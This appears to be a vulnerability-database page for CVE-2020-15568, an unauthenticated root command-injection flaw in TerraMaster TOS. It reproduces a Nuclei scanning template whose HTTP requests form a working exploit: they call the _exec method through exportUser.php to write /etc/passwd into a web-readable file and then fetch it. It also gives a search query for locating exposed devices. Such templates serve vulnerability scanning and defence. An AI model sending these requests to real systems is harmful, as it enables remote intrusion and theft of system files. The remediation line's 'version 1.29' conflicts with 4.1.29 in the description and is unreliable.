CVE-2020-15568: TerraMaster TOS <.1.29 - Remote Code Execution

日期: 2025-08-01 | 影响软件: TerraMaster TOS | POC: 已公开

漏洞描述

TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.

PoC代码[已公开]

id: CVE-2020-15568

info:
  name: TerraMaster TOS <.1.29 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.
  reference:
    - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15568
    - https://help.terra-master.com/TOS/view/
    - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568
    - https://github.com/n0bugz/CVE-2020-15568
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15568
    cwe-id: CWE-913
    epss-score: 0.9312
    epss-percentile: 0.99783
    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: tos
    fofa-query: '"terramaster" && header="tos"'
  tags: cve2020,cve,terramaster,rce,terra-master
variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /include/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220195ce27ede00bb9f684d2ae668b1511c297bda15f274c3c6f3ef481275e36dd0022100bc6df9f8816ca9f0984242220f8eef7941428eda5765d4ede6b19a92f5404652:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15568.yaml

相关漏洞推荐